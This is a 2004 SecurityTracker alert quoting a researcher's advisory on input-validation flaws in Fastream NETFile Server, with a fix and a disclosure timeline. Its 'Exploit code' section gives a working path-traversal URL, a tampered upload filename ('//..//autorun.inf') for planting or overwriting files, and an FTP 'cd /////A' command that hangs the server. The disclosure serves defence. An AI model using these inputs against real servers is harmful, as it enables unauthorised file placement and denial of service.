Fastream NETFile Server 'mkdir' Command Lets Remote Users Upload Files to Arbitrary Locations
|
|
SecurityTracker Alert ID: 1010642 |
|
SecurityTracker URL: http://securitytracker.com/id/1010642
|
|
CVE Reference:
GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Jul 4 2004
|
Impact:
Denial of service via network, Execution of arbitrary code via network, Modification of system information, Modification of user information, User access via network
|
Fix Available: Yes Vendor Confirmed: Yes Exploit Included: Yes
|
Version(s): prior to 6.7.2.1085
|
Description:
at4r reported some input validation vulnerabilities in the Fastream NETFile server. A remote user can upload files to the target web server and potentially execute the files. A remote user can also cause denial of service conditions via the FTP service.
It is reported that a remote user can upload files with arbitrary contents to folders located outside of the root directory with a URL that contains two slashes, such as the following URL:
http://HOST:PORT/?command=mkdir&filename=..//FOLDER_IS_OUTSIDE_THE_ROOT_DIRECTORY
A remote user can create malicious files on the target system or overwrite critical files on the target system. This may allow a remote user to gain access to the target system, the report said.
It is also reported that a remote authenticated user can cause denial of service conditions via the FTP port by issuing the following command:
cd /////A
This will cause the target service to hang for a period of time.
The vendor was reportedly notified on July 3, 2004.
|
Impact:
A remote user can upload files to arbitrary locations on the target system.
A remote authenticated user can cause denial of service conditions on the FTP service.
|
Solution:
The vendor has released a fixed version (6.7.3), available at:
http://www.fastream.com/download.htm
|
Vendor URL: www.fastream.com/download.htm (Links to External Site)
|
Cause:
Exception handling error, Input validation error
|
Underlying OS:
Windows (Any)
|
|
Message History:
None.
|
Source Message Contents
|
Date: Sun, 4 Jul 2004 15:37:27 +0200
Subject: Fastream NETFile FTP/Web Server Input validation Errors
|
Fastream NETFile FTP/Web Server Input validation Errors
--------------------------------------------------------
Release Date: 4 July 2004
Severity: High
Systems Affected: Fastream NETFile FTP/Web Server <=v.6.7.2.1085
Systems Not Affected: Fastream NETFile FTP/Web Server v6.7.3
Vendor URL: http://www.fastream.com/netfileserver.htm
Original Advisory: http://www.haxorcitos.com/Fastream_advisory.txt
Author: Andres Tarasco Acuna
email: at4r @ haxorcitos.com
WEB: www.haxorcitos.com
------------------
1. Description
------------------
Vendor's Description:
"Fastream NETFile Server is a secure FTP server and Web server combined
together
in one application. Our claim is that it is the easiest to setup and use
server
on the Internet!"
"Fastream NETFile FTP Server is a multi-threaded FTP server with virtual
links,
quotas, U/D ratio and extremely fast directory and file caches. Besides
being a
fast FTP server with full user and group based permissions and file and
directory
cache, NETFile Server is also a Web server that is developed for sharing
files.
Fastream NETFile Web Server is a web server with full HTTP 1.1 compatibility
with
support for multi-part downloads and keep-alive connections."
-------------------
2. Vulnerability
-------------------
There are some input validation errors in Fastream Netfile that allow users
to
bypass the root directory restrictions.
Due to the fact that Fastream Netfile allow remote users to
upload/create/delete
files in the application directory, its easy to exploit this vulnerability
and
compromise the system.
Another vulnerability was reported, in the way that Netfile handles some
Urls.
After requestin a special crafted directory it's possible to cause a 1
minute
Denial of Service.
-------------------
3. Exploit code
-------------------
The problem is in the way that Netfile handles two Slashes.
example URL:
http://HOST:PORT/?command=mkdir&filename=..//FOLDER_IS_OUTSIDE_THE_ROOT_DIRECTORY
C:\>dir FOLDE*
Volume in drive C is W2000P
Volume Serial Number is xxxx-xxxx
Directory of C:\
07/03/2004 07:47p <DIR> FOLDER_IS_OUTSIDE_THE_ROOT_DIRECTORY
0 File(s) 0 bytes
1 Dir(s) 119,015,936 bytes free
Netfile allows some other methods in the "command" parameter, that could be
used to
create/delete folders/files outside the Root directory.
To exploit the upload files vulnerability we need to take a look to the data
sent
in the POST request:
-----------------------------7d42c98700ea
Content-Disposition: form-data; name="upfile"; filename="D:\foo.txt"
Content-Type: text/plain
THIS IS AN EXAMPLE
-----------------------------7d42c98700ea--
Its possible for an attacker to modify the filename parameter to something
like:
Filename="//..//autorun.inf" and place malicious files in the system, or
overwrite
existing files.
Seems that the FTP Server is not vulnerable to this issue and transversal
directory
attacks are not possible, but there is another bug that allows malicious
users to cause
a denial of service by executing the following command:
D:\>ftp localhost
Connected to at4r.intranet.
220 Fastream NETFile FTP Server Ready
User (at4r.intranet:(none)): ftp
331 Password required for ftp.
Password:
230 User ftp logged in.
ftp> cd /////A <-- here the ftp server hangs for a lot of time
599 No such directory.
ftp>
-----------------
4. Solution:
-----------------
The best solution is to upgrade the software to version 6.7.3 that was
released by
vendor 3 july 2004.
Another way to minimize the impact of this vulnerability is to store the
root
directory of Fastream netfile server in other partition and remove
create/delete file
and directory permissions from all users, included Guest accounts.
-------------------
5. Timeline
-------------------
DISCLOSURE TIMELINE:
-3 July, 2004: Vendor Contacted.
-3 July, 2004: Issue Fixed after 2 hours. New release 6.7.3 available
-4 July, 2004: Public Disclosure
|
|
